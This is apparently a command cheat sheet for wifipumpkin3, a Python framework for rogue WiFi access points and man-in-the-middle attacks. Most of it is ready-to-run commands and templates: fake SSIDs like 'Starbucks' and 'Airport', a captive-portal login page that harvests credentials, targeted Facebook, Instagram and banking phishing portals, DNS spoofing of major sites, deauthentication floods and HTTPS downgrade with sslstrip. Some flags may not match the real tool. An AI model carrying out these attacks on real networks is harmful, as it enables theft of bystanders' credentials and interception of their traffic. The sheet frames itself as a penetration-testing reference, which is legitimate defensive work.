wifipumpkin3

Overview

wifipumpkin3 is a powerful Python 3 framework for creating rogue WiFi access points and performing MITM (Man-in-the-Middle) attacks. It enables wireless penetration testing through fake WiFi networks, captive portal credential harvesting, DNS spoofing, and traffic interception. Designed for authorized security testing and red team operations.

Installation

Command	Description
git clone https://github.com/mh4x0f/wifipumpkin3.git	Clone the repository
cd wifipumpkin3	Navigate to directory
python3 -m pip install -r requirements.txt	Install dependencies
sudo python3 setup.py install	Install wifipumpkin3 globally
pip3 install --user wifipumpkin3	User-level installation

Prerequisites

• Linux system (Kali, Ubuntu, Debian recommended)
• Python 3.6+
• Wireless adapter with monitor mode capability
• Root/sudo privileges required
• hostapd, dnsmasq, iptables installed

Basic Commands

Command	Description
sudo wifipumpkin3	Launch interactive mode
sudo wifipumpkin3 -i	Interactive CLI mode
sudo wifipumpkin3 --help	Display help menu
sudo wifipumpkin3 --version	Show version information
sudo wifipumpkin3 -x	Exit without cleanup

Creating Rogue Access Points

Basic Rogue AP Setup

# Launch interactive mode
sudo wifipumpkin3

# In interactive menu:
# 1. Select wireless interface
# 2. Choose SSID name
# 3. Configure channel
# 4. Set authentication type (Open/WPA2)
# 5. Start AP

Command-Line AP Creation

# Start with specific SSID
sudo wifipumpkin3 --ssid "FreeWiFi" --interface wlan0

# Set channel
sudo wifipumpkin3 --ssid "Corporate" --channel 6

# Configure WPA2 password
sudo wifipumpkin3 --ssid "Secure" --password "123456"

# Open network (no authentication)
sudo wifipumpkin3 --ssid "OpenNet" --type open

Wireless Interface Management

Command	Description
ifconfig	List network interfaces
ip link show	Display interface status
sudo airmon-ng check kill	Kill blocking processes
sudo airmon-ng start wlan0	Enable monitor mode (wlan0mon)
sudo airmon-ng stop wlan0mon	Disable monitor mode
iwconfig	Check wireless configuration

Captive Portal Configuration

Portal Types

Portal Type	Use Case
Login Portal	Harvests username/password
Social Media	Fake Facebook/Instagram login
Update Portal	Fake system/browser updates
ISP Portal	Mimics ISP authentication
Custom HTML	User-defined portal page

Creating Custom Captive Portal

# Access portal templates directory
cd /usr/share/wifipumpkin3/template

# View available templates
ls -la

# Edit HTML template
nano custom_portal.html

# Template structure:
# - HTML form with POST method
# - Target: /api/auth or custom endpoint
# - Fields for username, password, email, phone

Basic HTML Portal Template

cat > /tmp/portal.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>WiFi Login</title>
    <style>
        body { font-family: Arial; text-align: center; padding: 50px; }
        form { max-width: 300px; margin: auto; }
        input { width: 100%; padding: 10px; margin: 10px 0; }
        button { width: 100%; padding: 10px; background: #007bff; color: white; }
    </style>
</head>
<body>
    <h1>Free WiFi</h1>
    <form method="POST" action="/api/auth">
        <input type="email" name="email" placeholder="Email" required>
        <input type="password" name="password" placeholder="Password" required>
        <button type="submit">Connect</button>
    </form>
</body>
</html>
EOF

DNS Spoofing

DNS Configuration

Command	Description
set dns.server [IP]	Set DNS server IP
set dns.redirect [domain]	Redirect domain
enable dns	Enable DNS spoofing
disable dns	Disable DNS spoofing

DNS Spoof Examples

# Redirect all traffic to attacker IP
sudo wifipumpkin3 --dns-spoof 192.168.1.100

# Spoof specific domain
# Edit /etc/wifipumpkin3/dns.conf
192.168.1.100 google.com
192.168.1.100 facebook.com
192.168.1.100 twitter.com

# Load custom DNS config
sudo wifipumpkin3 --dns-config /path/to/dns.conf

DHCP Server Configuration

Setting	Command
DHCP range start	set dhcp.start 192.168.1.100
DHCP range end	set dhcp.end 192.168.1.200
Gateway IP	set dhcp.gateway 192.168.1.1
Subnet mask	set dhcp.netmask 255.255.255.0
DNS server	set dhcp.dns 192.168.1.1
Lease time	set dhcp.lease 3600

DHCP Configuration File

# DHCP config location
/etc/wifipumpkin3/dhcp.conf

# Example configuration
interface=wlan0
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=option:router,192.168.1.1
dhcp-option=option:dns-server,192.168.1.1
dhcp-option=option:domain-name,local

Proxy Plugins (Pumpkin-Proxy)

Available Proxy Modules

Module	Function
urllib3	HTTP/HTTPS proxy
dns-spoof	DNS hijacking
inject-code	Code injection
redirect	Traffic redirection
log-traffic	Packet logging

Enable Proxy Plugin

# In interactive mode
plugins
# Select proxy module
# Configure options

# CLI method
sudo wifipumpkin3 --plugin urllib3 --plugin-opts "log=true"

Custom Proxy Configuration

# Edit proxy configuration
nano /etc/wifipumpkin3/proxy.conf

# Configuration options
[proxy]
enabled = true
port = 8080
log_traffic = true
log_file = /var/log/wifipumpkin3/proxy.log
cache_enabled = true

Traffic Sniffing and Logging

Command	Description
sniff start	Begin packet capture
sniff stop	End packet capture
sniff export	Export captured data
sniff filter [type]	Filter by packet type
log view	View activity logs
log clear	Clear log files

Packet Capture Examples

# Capture HTTP credentials
sudo wifipumpkin3 --sniff http

# Capture HTTPS traffic
sudo wifipumpkin3 --sniff https

# Capture all traffic
sudo wifipumpkin3 --sniff all

# Save to PCAP file
sudo wifipumpkin3 --pcap /tmp/capture.pcap

Log File Locations

# Main logs
/var/log/wifipumpkin3/

# Credential captures
/var/log/wifipumpkin3/credentials.log

# Traffic logs
/var/log/wifipumpkin3/traffic.log

# Captured clients
/var/log/wifipumpkin3/clients.log

Credential Harvesting

Captive Portal Harvesting

# Enable credential logging
set logging.credentials true

# View captured credentials
tail -f /var/log/wifipumpkin3/credentials.log

# Export credentials
wifipumpkin3-export --format csv credentials.log

Credential Format

[timestamp] - username:password
[timestamp] - email:password
[timestamp] - phone:code

Targeted Credential Harvesting

# Harvest specific service credentials
sudo wifipumpkin3 --portal facebook

# Social media harvesting
sudo wifipumpkin3 --portal instagram

# Bank login harvesting
sudo wifipumpkin3 --portal banking

Deauthentication Attacks

Deauth Commands

Command	Description
deauth all	Deauth all clients
deauth [MAC]	Target specific client
deauth --bssid [BSSID]	Deauth by AP
deauth --count [N]	Send N deauth frames
deauth --interval [ms]	Set interval between frames

Deauth Examples

# Deauth all clients from AP
sudo wifipumpkin3 --deauth all

# Deauth specific client
sudo wifipumpkin3 --deauth AA:BB:CC:DD:EE:FF

# Continuous deauth with interval
sudo wifipumpkin3 --deauth all --interval 100

# Limit deauth packets
sudo wifipumpkin3 --deauth all --count 50

Module System

Available Modules

Module	Purpose
hostapd	Access point control
dnsmasq	DHCP/DNS server
iptables	Packet filtering/NAT
ettercap	MITM attack engine
sslstrip	HTTPS downgrade
mitmproxy	HTTP/HTTPS proxy

Module Management

# List loaded modules
modules list

# Enable module
modules enable [name]

# Disable module
modules disable [name]

# Check module status
modules status

# View module logs
modules log [name]

Custom Module Creation

# Module directory
/usr/share/wifipumpkin3/modules/

# Module template
#!/usr/bin/env python3
class CustomModule:
    def __init__(self):
        self.name = "custom_module"
        self.enabled = False
    
    def start(self):
        self.enabled = True
    
    def stop(self):
        self.enabled = False

Interactive Mode Menu

Main Menu Navigation

# Access main menu
? - Show commands
help - Display full help
exit - Quit application
clear - Clear screen

# Submenu access
ap - Access point settings
dhcp - DHCP configuration
dns - DNS spoofing options
proxy - Proxy settings
plugins - Load plugins
sniff - Packet sniffing
logs - View logs
clients - Connected clients

Client Management

# List connected clients
clients list

# Show client details
clients info [MAC]

# Kick client offline
clients kick [MAC]

# Block client MAC
clients block [MAC]

# View client packets
clients sniff [MAC]

Advanced Usage

Starting with Configuration File

# Create config file
cat > /tmp/wifipumpkin3.conf << 'EOF'
[ap]
ssid = FreeWiFi
interface = wlan0
channel = 6
password = 

[dhcp]
start = 192.168.1.100
end = 192.168.1.200
gateway = 192.168.1.1

[dns]
spoof = true
redirect = 192.168.1.1

[logging]
credentials = true
traffic = true
EOF

# Launch with config
sudo wifipumpkin3 --config /tmp/wifipumpkin3.conf

Multi-SSID Broadcasting

# Create multiple SSIDs
sudo wifipumpkin3 --ssid "FreeWiFi" --ssid "Starbucks" --ssid "Airport"

# Different channels per SSID
sudo wifipumpkin3 --ssid "Network1" --channel 1 --ssid "Network2" --channel 6

SSL Strip Configuration

# Enable HTTPS downgrade
set sslstrip.enabled true

# Configure port
set sslstrip.port 8080

# Log SSL sessions
set sslstrip.log true

Troubleshooting

Issue	Solution
”Permission denied”	Run with sudo
Adapter in use	sudo airmon-ng check kill
DHCP not working	Restart dnsmasq: sudo service dnsmasq restart
DNS not resolving	Check /etc/resolv.conf permissions
Clients can’t connect	Verify hostapd is running: ps aux | grep hostapd
Capture not logging	Check log directory permissions: chmod 755 /var/log/wifipumpkin3/

Debug Mode

# Run with verbose logging
sudo wifipumpkin3 -vvv

# Enable debug output
sudo wifipumpkin3 --debug

# Check service status
sudo systemctl status wifipumpkin3

# View system logs
sudo journalctl -u wifipumpkin3 -f

Cleanup and Restoration

# Stop all wifipumpkin3 processes
sudo wifipumpkin3 --stop

# Kill AP and restore network
sudo wifipumpkin3 --cleanup

# Reset hostapd
sudo killall hostapd

# Restart networking
sudo systemctl restart networking

# Restore iptables rules
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -F
sudo iptables -X

Legal and Ethical Considerations

• Authorization required: Only use on networks you own or have explicit permission to test
• Jurisdiction: Check local laws regarding WiFi interception and MITM attacks
• Logging: Comply with data retention and privacy laws
• Disclosure: Report vulnerabilities to system owners
• Professional use: Restrict to authorized penetration testing engagements

Resources

Resource	Purpose
GitHub Repository	Official source code
Documentation Wiki	Full documentation
Issue Tracker	Bug reports and support
Kali Tools	Kali Linux integration

Related Tools

• hostapd - WiFi access point daemon
• dnsmasq - DHCP and DNS server
• ettercap - Network MITM framework
• mitmproxy - Interactive HTTPS proxy
• Wireshark - Network packet analysis
• aircrack-ng - WiFi security auditing
• hashcat - Password hash cracking